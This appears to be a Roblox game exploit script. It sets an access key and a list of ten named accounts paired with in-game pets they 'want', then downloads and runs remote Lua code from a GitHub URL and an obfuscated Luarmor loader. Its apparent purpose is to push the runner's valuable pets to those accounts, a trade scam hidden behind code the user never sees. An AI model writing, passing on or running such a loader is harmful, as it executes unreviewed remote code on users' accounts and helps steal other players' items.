if not game:IsLoaded() then
    repeat
        game.Loaded:Wait()
    until game:IsLoaded()
end

getgenv().KEY = "NASACOMPUTER888"
_G.TradeManage = {
    TargetConfigs = {
        ["Ayoshipship"] = {
            wantedPets = {"French Fry Ferret"}
        },
		["OrvilleuMoEfH"] = {
            wantedPets = {"French Fry Ferret"}
        },
        ["KingSentz645770"] = {
            wantedPets = {"French Fry Ferret"}
        },
        ["zaq12wsx4z"] = {
            wantedPets = {"Lobster Thermidor"}
        },
        ["19111993k"] = {
            wantedPets = {"Lobster Thermidor"}
        },
        ["Taylor117k"] = {
            wantedPets = {"Lobster Thermidor"}
        },
        ["oreosandmilk2q"] = {
            wantedPets = {"Disco Bee", "Butterfly", "Brontosaurus", "Mimic Octopus", "Dragonfly", "Red Fox", "Dilophosaurus", "T-Rex", "Spinosaurus"}
        },
        ["NoahXShop"] = {
            wantedPets = {"Disco Bee", "Butterfly", "Brontosaurus", "Mimic Octopus", "Dragonfly", "Red Fox", "Dilophosaurus", "T-Rex", "Spinosaurus"}
        },
		["Minecraft_1u"] = {
            wantedPets = {"Disco Bee", "Butterfly", "Brontosaurus", "Mimic Octopus", "Dragonfly", "Red Fox", "Dilophosaurus", "T-Rex", "Spinosaurus"}
        },
        ["nachan279"] = {
            wantedPets = {"Disco Bee", "Butterfly", "Brontosaurus", "Mimic Octopus", "Dragonfly", "Red Fox", "Dilophosaurus", "T-Rex", "Spinosaurus"}
        }
    }
}
getgenv().YourScript = function()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/0xztnes/testsc/refs/heads/main/LOAD1"))()
end
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/64146f41d4c3ead8fb6d71339ef0c7c2.lua"))()
